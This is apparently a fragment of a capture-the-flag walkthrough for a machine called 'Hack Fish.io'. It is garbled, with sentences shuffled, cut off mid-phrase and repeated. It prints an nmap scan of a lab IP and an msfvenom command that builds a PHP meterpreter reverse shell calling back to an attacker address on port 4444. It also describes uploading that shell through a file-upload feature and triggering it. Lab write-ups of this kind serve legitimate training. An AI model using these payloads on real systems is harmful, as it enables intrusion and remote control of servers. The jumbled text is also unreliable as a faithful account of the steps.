Hack Fish.io | Mobile |
We create a PHP reverse shell using a tool like msfvenom :
<!-- TODO: move to prod env --> This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces: hack fish.io
nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further. We create a PHP reverse shell using a
To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services: To begin, we need to gather information about
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:
We create a PHP reverse shell using a tool like msfvenom :
<!-- TODO: move to prod env --> This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:
nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further.
To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:
